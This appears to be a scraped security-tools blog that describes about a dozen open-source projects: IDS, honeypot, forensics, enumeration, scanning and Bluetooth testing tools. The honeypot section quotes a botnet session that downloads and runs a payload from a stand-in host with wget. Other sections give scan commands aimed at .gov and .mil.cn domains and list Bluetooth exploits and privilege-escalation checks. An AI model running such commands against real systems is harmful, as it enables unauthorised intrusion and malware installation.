Security Onion - Linux Distro For IDS, NSM, And Log Management

Security Onion is a free and open source Linux distribution for intrusion detection, enterprise security monitoring, and log management. It includes Elasticsearch, Logstash, Kibana, Snort, Suricata, Bro, OSSEC, Sguil, Squert, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Security-onion project

This repo contains the ISO image, Wiki, and Roadmap for Security Onion.

Looking for documentation?

Please proceed to the Wiki.

Screenshots

Download Security-Onion

Read More

Analyze The Security Of Any Domain By Finding All the Information Possible - Domain Analyzer

Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.

How

Domain analyzer takes a domain name and finds information about it, such as DNS servers, mail servers, IP addresses, mails on Google, SPF information, etc. After all the information is stored and organized it scans the ports of every IP found using nmap and perform several other security checks. After the ports are found, it uses the tool crawler.py from @verovaleros, to spider the complete web page of all the web ports found. This tool has the option to download files and find open folders.

Current version is 0.8 and the main features are:

• It creates a directory with all the information, including nmap output files.
• It uses colors to remark important information on the console.
• It detects some security problems like host name problems, unusual port numbers and zone transfers.
• It is heavily tested and it is very robust against DNS configuration problems.
• It uses nmap for active host detection, port scanning and version information (including nmap scripts).
• It searches for SPF records information to find new hostnames or IP addresses.
• It searches for reverse DNS names and compare them to the hostname.
• It prints out the country of every IP address.
• It creates a PDF file with results.
• It automatically detects and analyze sub-domains!
• It searches for domains emails.
• It checks the 192 most common hostnames in the DNS servers.
• It checks for Zone Transfer on every DNS server.
• It finds the reverse names of the /24 network range of every IP address.
• It finds active host using nmap complete set of techniques.
• It scan ports using nmap (remember that for the SYN scan you need to need root).
• It searches for host and port information using nmap.
• It automatically detects web servers used.
• It crawls every web server page using our crawler.py tool. See the description below.
• It filters out hostnames based on their name.
• It pseudo-randomly searches N domains in Google and automatically analyze them!
• Uses CTRL-C to stop current analysis stage and continue working.
• It can read an external file with domain names and try to find them on the domain.

Bonus features
@verovaleros developed a separate python web crawler called "crawler.py". Its main features are:

• Crawl http and https web sites.
• Crawl http and https web sites not using common ports.
• Uses regular expressions to find 'href' and 'src' html tag. Also content links.
• Identifies relative links.
• Identifies domain related emails.
• Identifies directory indexing.
• Detects references to URLs like 'file:', 'feed=', 'mailto:', 'javascript:' and others.
• Uses CTRL-C to stop current crawler stages and continue working.
• Identifies file extensions (zip, swf, sql, rar, etc.)
• Download files to a directory:
  • Download every important file (images, documents, compressed files).
  • Or download specified files types.
  • Or download a predefined set of files (like 'document' files: .doc, .xls, .pdf, .odt, .gnumeric, etc.).
• Maximum amount of links to crawl. A default value of 5000 URLs is set.
• Follows redirections using HTML and JavaScript Location tag and HTTP response codes.

This extended edition has more features!

• World-domination: You can automatically analyze the whole world! (if you have time)
• Robin-hood: Although it is still in development, it will let you send automatically an email to the mails found during scan with the analysis information.
• Robtex DNS: With this incredible function, every time you found a DNS servers with Zone Transfer, it will retrieve from the Robtex site other domains using that DNS server! It will automatically analyze them too! This can be a never ending test! Every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved can be unrelated to the first one.

Examples

• Find 10 random domains in the .gov domain and analyze them fully (including web crawling). If it finds some Zone Transfer, retrieve more domains using them from Robtex!!

  domain_analyzer.py -d .gov -k 10 -b

• (Very Quick and dirty) Find everything related with .edu.cn domain, store everything in directories. Do not search for active host, do not nmap scan them, do not reverse-dns the netblock, do not search for emails.

  domain_analyzer.py -d edu.cn -b -o -g -a -n

• Analyze the 386.edu.ru domain fully

  domain_analyzer.py -d 386.edu.ru -b -o

• (Pen tester mode). Analyze a domain fully. Do not find other domains. Print everything in a pdf file. Store everything on disk. When finished open Zenmap and show me the topology every host found at the same time!

  domain_analyzer.py -d amigos.net -o -e

• (Quick with web crawl only). Ignore everything with 'google' on it.

  domain_analyzer.py -d mil.cn -b -o -g -a -n -v google -x '-O --reason --webxml --traceroute -sS -sV -sC -PN -n -v -p 80,4443'

• (Everything) Crawl up to 100 URLs of this site including subdomains. Store output into a file and download every INTERESTING file found to disk.

  crawler.py -u www.386.edu.ru -w -s -m 100 -f

• (Quick and dirty) Crawl the site very quick. Do not download files. Store the output to a file.

  crawler.py -u www.386.edu.ru -w -m 20

• (If you want to analyze metadata later with lafoca). Verbose prints which extensions are being downloaded. Download only the set of archives corresponding to Documents (.doc, .docx, .ppt, .xls, .odt. etc.)

  crawler.py -u ieeeexplore.ieee.org/otherfiles/ -d -v

Most of these features can be deactivated.

Screenshots

1. Example domain_analyzer.py -d .gov -k 10 -b

Installation
Just untar the .tar.gz file and copy the python files to the /usr/bin/ directory. Domain_analyzer needs to be run as root. The crawler can be run as a non-privileged user. If you want all the features (web crawler, pdf and colors), which is nice, also copy these files to /usr/bin or /usr/local/bin

• ansistrm.py
• crawler.py
• pyText2pdf.py

If you have any issues with the GeoIP database, please download it from its original source here. And install it in where your system needs it, usually at /opt/local/share/GeoIP/GeoIP.dat

Download Domain Analyzer

Read More

Bluetooth Security Testing Suite - BlueMaho v090417

BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do - testing to find unknown vulns. Also it can form nice statistics.

1.2. What it can do? (features)

• scan for devices, show advanced info, SDP records, vendor etc
• track devices - show where and how much times device was seen, its name changes
• loop scan - it can scan all time, showing you online devices
• alerts with sound if new device found
• on_new_device - you can spacify what command should it run when it founds new device
• it can use separate dongles - one for scaning (loop scan) and one for running tools or exploits
• send files
• change name, class, mode, BD_ADDR of local HCI devices
• save results in database
• form nice statistics (uniq devices by day/hour, vendors, services etc)
• test remote device for known vulnerabilities (see exploits for more details)
• test remote device for unknown vulnerabilities (see tools for more details)
• themes! you can customize it

1.3. What tools and exploits it consist of?

• tools:
• atshell.c by Bastian Ballmann (modified attest.c by Marcel Holtmann)
• bccmd by Marcel Holtmann
• bdaddr.c by Marcel Holtmann
• bluetracker.py by smiley
• carwhisperer v0.2 by Martin Herfurt
• psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin R. Mulliner
• BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
• btftp v0.1 by Marcel Holtmann
• btobex v0.1 by Marcel Holtmann
• greenplaque v1.5 by digitalmunition.com
• L2CAP packetgenerator by Bastian Ballmann
• obex stress tests 0.1
• redfang v2.50 by Ollie Whitehouse
• ussp-push v0.10 by Davide Libenzi
• exploits/attacks:
• Bluebugger v0.1 by Martin J. Muench
• bluePIMp by Kevin Finisterre
• BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
• helomoto by Adam Laurie
• hidattack v0.1 by Collin R. Mulliner
• Mode 3 abuse attack
• Nokia N70 l2cap packet DoS PoC Pierre Betouin
• opush abuse (prompts flood) DoS attack
• Sony-Ericsson reset display PoC by Pierre Betouin
• you can add your own tools by editing 'exploits/exploits.lst' and 'tools/tools.lst'

1.4. Requirements

• OS (tested with Debian 4.0 Etch / 2.6.18)
• python (python 2.4 http://www.python.org)
• wxPython (python-wxgtk2.6 http://www.wxpython.org)
• BlueZ (3.9/3.24) http://www.bluez.org
• Eterm to open tools somewhere, you can set another term in 'config/defaul.conf' changing the value of 'cmd_term' variable. (tested with 1.1 ver)
• pkg-config(0.21), 'tee' used in tools/showmaxlocaldevinfo.sh, openobex, obexftp
• libopenobex1 + libopenobex-dev (needed by ussp-push)
• libxml2, libxml2-dev (needed by btftp)
• libusb-dev (needed by bccmd)
• libreadline5-dev (needed by atshell.c)
• lightblue-0.3.3 (needed by obexstress.py)
• hardware: any bluez compatible bluetooth-device

1.5. Configuration

1. all configuration is in 'config' dir.
2. for using bluemaho propertly you need to build tools and exploits. check if you satisfy 'requirements' for bluemaho. then run 'build.sh'. if you see 'Building complete!' message, than all went OK. if not - try to play around requirements.
3. 'default.conf' is a default configuration file, you can edit it if you need to change some options, path to files and commands used by bluemaho, theme etc. by default you don't need to change it if you do all from 'requirements' chapter. but, please, view it, for example just for setting 'user_location' variable for defining you location, which will be used for tracking function.
4. 'themes' - directory with themes for bluemaho GUI. You can set path to default theme with 'theme' variable in 'default.conf'

1.6. Run and use

You can run BlueMaho typing in console 'bluemaho.py'. For verbose output in console (and redirecting std_err and std_out) run 'bluemaho.py -v'. it saves founded devices to 'bluemaho.log' by default, you can change it in 'config/defaul.conf'. enjoy! 

Download BlueMaho

Read More

Easy-To-Use Live Forensics Toolbox For Linux Endpoints - Linux Expl0rer

Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.

Capabilities

ps

• View full process list
• Inspect process memory map & fetch memory strings easly
• Dump process memory in one click
• Automaticly search hash in public services
  • VirusTotal
  • AlienVault OTX

users

• users list

find

• Search for suspicious files by name/regex

netstat

• Whois

logs

• syslog
• auth.log(user authentication log)
• ufw.log(firewall log)
• bash history

anti-rootkit

• chkrootkit

yara

• Scan a file or directory using YARA signatures by @Neo23x0
• Scan a running process memory address space
• Upload your own YARA signature

Requirements

• Python 2.7
• YARA
• chkrootkit

Installation

1. Clone repository

git clone https://github.com/intezer/linux_expl0rer

2. Install required packages

pip install -r requirements.txt

3. Setup VT/OTX api keys

nano config.py

Edit following lines:

VT_APIKEY = '<key>'
OTX_APIKEY = '<key>'

4. Install YARA

sudo apt-get install yara

5. Install chkrootkit

sudo apt-get install chkrootkit

Start Linux Expl0rer server

sudo python linux_explorer.py

Usage

1. Start your browser

firefox http://127.0.0.1:8080

2. do stuff

Notes

• We recommend using NGINX reverse proxy with basic http auth & ssl for secure remote access
• Tested with Ubuntu 16.04

Download Linux Expl0rer

Read More

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot

This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.

Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

Architekure

The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.

However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running

The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode

python honey.py

Server

python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection

enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 

Images

Download Telnet IoT Honeypot

Read More

Scripted Local Linux Enumeration and Privilege Escalation Checks - LinEnum v0.6

LinEnum will automate many of the checks that I’ve documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.

General usage:
version 0.6

• Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t

OPTIONS:

• -k Enter keyword
• -e Enter export location
• -t Include thorough (lengthy) tests
• -r Enter report name
• -h Displays this help text

Running with no options = limited scans/no output file

• -e Requires the user enters an output location i.e. /tmp/export. If this location does not exist, it will be created.
• -r Requires the user to enter a report name. The report (.txt file) will be saved to the current working directory.
• -t Performs thorough (slow) tests. Without this switch default 'quick' scans are performed.
• -k An optional switch for which the user can search for a single keyword within many files (documented below).

High-level summary of the checks/tasks performed by LinEnum:

• Kernel and distribution release details
• System Information:
  • Hostname
  • Networking details:
  • Current IP
  • Default route details
  • DNS server information
• User Information:
  • Current user details
  • Last logged on users
  • Shows users logged onto the host
  • List all users including uid/gid information
  • List root accounts
  • Extracts password policies and hash storage method information
  • Checks umask value
  • Checks if password hashes are stored in /etc/passwd
  • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
  • Attempt to read restricted files i.e. /etc/shadow
  • List current users history files (i.e .bash_history, .nano_history etc.)
  • Basic SSH checks
• Privileged access:
  • Determine if /etc/sudoers is accessible
  • Determine if the current user has Sudo access without a password
  • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
  • Is root’s home directory accessible
  • List permissions for /home/
• Environmental:
  • Display current $PATH
  • Displays env information
• Jobs/Tasks:
  • List all cron jobs
  • Locate all world-writable cron jobs
  • Locate cron jobs owned by other users of the system
• Services:
  • List network connections (TCP & UDP)
  • List running processes
  • Lookup and list process binaries and associated permissions
  • List inetd.conf/xined.conf contents and associated binary file permissions
  • List init.d binary permissions
• Version Information (of the following):
  • Sudo
  • MYSQL
  • Postgres
  • Apache
    • Checks user config
    • Shows enabled modules
• Default/Weak Credentials:
  • Checks for default/weak Postgres accounts
  • Checks for default/weak MYSQL accounts
• Searches:
  • Locate all SUID/GUID files
  • Locate all world-writable SUID/GUID files
  • Locate all SUID/GUID files owned by root
  • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
  • List all world-writable files
  • Find/list all accessible *.plan files and display contents
  • Find/list all accessible *.rhosts files and display contents
  • Show NFS server details
  • Locate *.conf and *.log files containing keyword supplied at script runtime
  • List all *.conf files located in /etc
  • Locate mail
• Platform/software specific tests:
  • Checks to determine if we're in a Docker container
  • Checks to see if the host has Docker installed

Download LinEnum

Read More

Web Service Security Assessment Tool - WSSAT

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests against the security vulnerabilities. It also makes information disclosure controls. With this tool, all web services could be analyzed at once and the overall security assessment could be seen by the organization.

Objectives of WSSAT are to allow organizations:

• Perform their web services security analysis at once
• See overall security assessment with reports
• Harden their web services

WSSAT’s main capabilities include:

Dynamic Testing:

• Insecure Communication - SSL Not Used
• Unauthenticated Service Method
• Error Based SQL Injection
• Cross Site Scripting
• XML Bomb
• External Entity Attack - XXE
• XPATH Injection
• Verbose SOAP Fault Message

Static Analysis:

• Weak XML Schema: Unbounded Occurrences
• Weak XML Schema: Undefined Namespace
• Weak WS-SecurityPolicy: Insecure Transport
• Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
• Weak WS-SecurityPolicy: Tokens Not Protected

Information Leakage:

• Server or technology information disclosure

WSSAT’s main modules are:

• Parser
• Vulnerabilities Loader
• Analyzer/Attacker
• Logger
• Report Generator

The main difference of WSSAT is to create a dynamic vulnerability management environment instead of embedding the vulnerabilities into the code.

This project has been developed as Term Project at Middle East Technical University (METU), Software Management master program.

Download WSSAT

Read More

Nmap 7.60 - Free Security Scanner For Network Exploration & Security Audits

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Features

• Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
• Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
• Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
• Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
• Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
• Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
• Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
• Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
• Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

Changelog

• [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing several
issues with installation and compatibility with the Windows 10 Creators
Update.

• [NSE][GH#910] NSE scripts now have complete SSH support via libssh2,
including password brute-forcing and running remote commands, thanks to the
combined efforts of three Summer of Code students: [Devin Bjelland, Sergey
Khegay, Evangelos Deirmentzoglou]

• [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579!
They are all listed at https://nmap.org/nsedoc/, and the summaries are
below:

   - ftp-syst sends SYST and STAT commands to FTP servers to get system
   version and connection information. [Daniel Miller]
   - [GH#916] http-vuln-cve2017-8917 checks for an SQL injection
   vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]
   - iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr
   Timorin, Daniel Miller]
   - [GH#915] openwebnet-discovery retrieves device identifying information
   and number of connected devices running on openwebnet protocol. [Rewanth
   Cool]
   - puppet-naivesigning checks for a misconfiguration in the Puppet CA
   where naive signing is enabled, allowing for any CSR to be automatically
   signed. [Wong Wai Tuck]
   - [GH#943] smb-protocols discovers if a server supports dialects NT LM
   0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old
   smbv2-enabled script. [Paulino Calderon]
   - [GH#943] smb2-capabilities lists the supported capabilities of
   SMB2/SMB3 servers. [Paulino Calderon]
   - [GH#943] smb2-time determines the current date and boot date of SMB2
   servers. [Paulino Calderon]
   - [GH#943] smb2-security-mode determines the message signing
   configuration of SMB2/SMB3 servers. [Paulino Calderon]
   - [GH#943] smb2-vuln-uptime attempts to discover missing critical
   patches in Microsoft Windows systems based on the SMB2 server uptime.
   [Paulino Calderon]
   - ssh-auth-methods lists the authentication methods offered by an SSH
   server. [Devin Bjelland]
   - ssh-brute performs brute-forcing of SSH password credentials. [Devin
   Bjelland]
   - ssh-publickey-acceptance checks public or private keys to see if they
   could be used to log in to a target. A list of known-compromised key pairs
   is included and checked by default. [Devin Bjelland]
   - ssh-run uses user-provided credentials to run commands on targets via
   SSH. [Devin Bjelland]

• [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3
improvements. It was fully replaced by the smb-protocols script.

• [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect
(client) mode with --udp --ssl. Also added Application Layer Protocol
Negotiation (ALPN) support with the --ssl-alpn option. [Denis Andzakovic,
Daniel Miller]

• Updated the default ciphers list for Ncat and the secure ciphers list for
Nsock to use "!aNULL:!eNULL" instead of "!ADH". With the addition of ECDH
ciphersuites, anonymous ECDH suites were being allowed. [Daniel Miller]

• [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning Veritas
Backup Exec Agent 15 or 16. [Andrew Orr]

• [NSE][GH#943] Added new SMB2/3 library and related scripts. [Paulino
Calderon]

• [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames that
resolve to unique addresses will be listed. [Aaron Heesakkers]

• [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handle
TLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]

• [NSE][GH#936] Function url.escape no longer encodes so-called
"unreserved" characters, including hyphen, period, underscore, and tilde,
as per RFC 3986. [nnposter]

• [NSE][GH#935] Function http.pipeline_go no longer assumes that persistent
connections are supported on HTTP 1.0 target (unless the target explicitly
declares otherwise), as per RFC 7230. [nnposter]

• [NSE][GH#934] The HTTP response object has a new member, version, which
contains the HTTP protocol version string returned by the server, e.g.
"1.0". [nnposter]

• [NSE][GH#938] Fix handling of the objectSID Active Directory attribute by
ldap.lua. [Tom Sellers]

• [NSE] Fix line endings in the list of Oracle SIDs used by
oracle-sid-brute. Carriage Return characters were being sent in the
connection packets, likely resulting in failure of the script. [Anant
Shrivastava]

• [NSE][GH#141] http-useragent-checker now checks for changes in HTTP
status (usually 403 Forbidden) in addition to redirects to indicate
forbidden User Agents. [Gyanendra Mishra]

Download Nmap 7.60

Read More

anti-ARP-spoofing application software and uses active scanning method to detect any ARP-spoofing incidents - shARP

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive. Defensive mode protects the end user from the spoofer by dissconnecting the user's system from the network and alerts the user by an audio message. The offensive mode dissconnects the user's system from the network and further kicks out the attacker by sending de-authentication packets to his system, unabling him to reconnect to the network until the program is manually reset. The program creates a log file (/usr/shARP/)containing the details of the attack such as, the attackers mac address, mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained mac address. If required the attacker can be permanently banned from the netwrk by feeding his mac address to the block list of the router. The whole program is designed specially for linux and is writen in Linux s is hell command (bash command). In the offensive mode the program downloads an open-source application from the internet with the permission of the user namely aircrack-ng (if not present in the user's system already ). Since it is written in python language, you must have python installed on your system for it to work. Visit https://www.aircrack-ng.org for more info.

If the user wants to secure his network by scanning for any attacker he can run the program. the program offers a simple command line interface which makes it easy for the new users.the user can directly access the defensive or offensive mode by inputing the respective command line arguments along with the execution code just as in any other linux command to operate a software through CLI. In case the user inputs any wrong command line argument, the program prompts the user to use the help option. the help option provides the details about the two modes. when the user runs the program in defensive mode, he recieves the original mac address of the gateway. If there is no man in the middle attack, the screen stays idle. As soon as the program detects a spoofer in the network, it outputs the mac address of the spoofer and the time of the attack. It then dissconnects the users's system from the network so as to protect the private data being transfered between the system and the server. It also saves a log file about the attacker for further use. when the user runs the program in offensive mode,he recieves the original mac address of the gateway. If there is no man in the middle attack, the screen stays idle. As soon as the program detects a spoofer in the network, it outputs the mac address of the spoofer and the time of the attack as in the defensive mode. But further, the program puts the user's Network Interface Card to monitor mode with the help of the application 'Airmon-ng'. Then the application 'Aircrack-ng' gets activated and starts sending deauthentication packets to the attacker's system. This process kicks out the attacker from the network. The program also creates a log file about the attack.

How to use

bash ./shARP.sh -r [interface] to reset the network card and driver.  
bash ./shARP.sh -d [interface] to activate the program in defense mode.  
bash ./shARP.sh -o [interface] to activate the program in offense mode.  
bash ./shARP.sh -h             for help.

Download shARP

Read More

Nix Audit Made Easier - Nix-Auditor

A script to audit linux and unix distributions based mainly on the CIS standards and universal linux hardening guidelines. The value it brings to your auditing set of tools is:

• Speed - one can audit OS in less than 120 seconds and get report
• Accuracy - tested on CentOS and RedHat with 100% accuracy
• Customizeability - it is on github, code is easily customizeable to suit the OS type and the set of controls one needs to check.
• Simplicity - just make it executable an run!

Download Nix-Auditor

Read More

Distributed alerting for the masses! - Securitybot

Distributed alerting for the masses!

Securitybot is an open-source implementation of a distributed alerting chat bot, as described in Ryan Huber's blog post. Distributed alerting improves the monitoring efficiency of your security team and can help you catch security incidents faster and more efficiently. We've tried to remove all Dropbox-isms from this code so that setting up your own instance should be fairly painless. It should be relatively easy to install the listed requirements in a virtualenv/Docker container and simply have the bot do its thing. We also provide a simple front end to dive through the database, receive API calls, and create custom alerts for the bot to reach out to people as desired.

Deploying

This guide runs through setting up a Securitybot instance as quickly as possible with no frills. We'll be connecting it to Slack, SQL, and Duo. Once we're done, we'll have a file that looks something like main.py.

SQL

You'll need a database called securitybot on some MySQL server somewhere. We've provided a function called init_sql located in securitybot/sql.py that will initialize SQL. Currently it's set up to use the host localhost with user root and no password. You'll need to change this because of course that's not how your database is set up.

Slack

You'll need a token to be able to integrate with Slack. The best thing to do would be to create a bot user and use that token for Securitybot. You'll also want to set up a channel to which the bot will report when users specify that they haven't performed an action. Find the unique ID for that channel (it'll look similar to C123456) and be sure to invite the bot user into that channel, otherwise it won't be able to send messages.

Duo

For Duo, you'll want to create an Auth API instances, name it something clever, and keep track of the integration key, secret key, and auth API endpoint URI.

Running the bot

Take a look at the provided main.py in the root directory for an example on how to use all of these. Replace all of the global variables with whatever you found above. If the following were all generated successfully, Securitybot should be up and running. To test it, message the bot user it's assigned to and say hi. To test the process of dealing with an alert, message test to test the bot.

Architecture

Securitybot was designed to be as modular as possible. This means that it's possible to easily swap out chat systems, 2FA providers, and alerting data sources. The only system that is tightly integrated with the bot is SQL, but adding support for other databases shouldn't be difficult. Having a database allows alerts to be persistent and means that the bot doesn't lose (too much) state if there's some transient failure.

Securitybot proper

The bot itself performs a small set of functions:

1. Reads messages, interpreting them as commands.
2. Polls each user object to update their state of applicable.
3. Grabs new alerts from the database and assigns them to users or escalates on an unknown user.

Messaging, 2FA, and alert management are provided by configurable modules, and added to the bot upon initialization.

Commands

The bot handles incoming messages as commands. Command parsing and handling is done in the Securitybot class and the commands themselves are provided in two places. The functions for the commands are defined in commands.py and their structure is defined in commands.yaml under the config/ directory.

Messaging

Securitybot is designed to be compatible with a wide variety of messaging systems. We currently provide bindings for Slack, but feel free to contribute any other plugins, like for Gitter or Zulip, upstream. Messaging is made possible by securitybot/chat/chat.py which provides a small number of functions for querying users in a messaging group, messaging those users, and sending messages to a specific channel/room. To add bindings for a new messaging system, subclass Chat.

2FA

2FA support is provided by auth/auth.py, which wraps async 2FA in a few functions that enable checking for 2FA capability, starting a 2FA session, and polling the state of the 2FA session. We provide support for Duo Push via the Duo Auth API, but adding support for a different product or some in-house 2FA solution is as easy as creating a subclass of Auth.

Task management

Task management is provided by tasker/tasker.py and the Tasker class. Since alerts are logged in an SQL database, the provided Tasker is SQLTasker. This provides support for grabbing new tasks and updating them via individual Task objects.

Blacklists

Blacklists are handled by the SQL database, provided in blacklist/blacklist.py and the subclass blacklist/sql_blacklist.py.

Users

The User object provides support for handling user state. We keep track of whatever information a messaging system gives to us, but really only ever use a user's unique ID and username in order to contact them.

Alerts

Alerts are uniquely identified by a SHA-256 hash which comes from some hash of the event that generated them. We assume that a SHA-256 hash is sufficiently random for there to be no collisions. If you encounter a SHA-256 collision, please contact someone at your nearest University and enjoy the fame and fortune it brings upon you.

Download Securitybot

Read More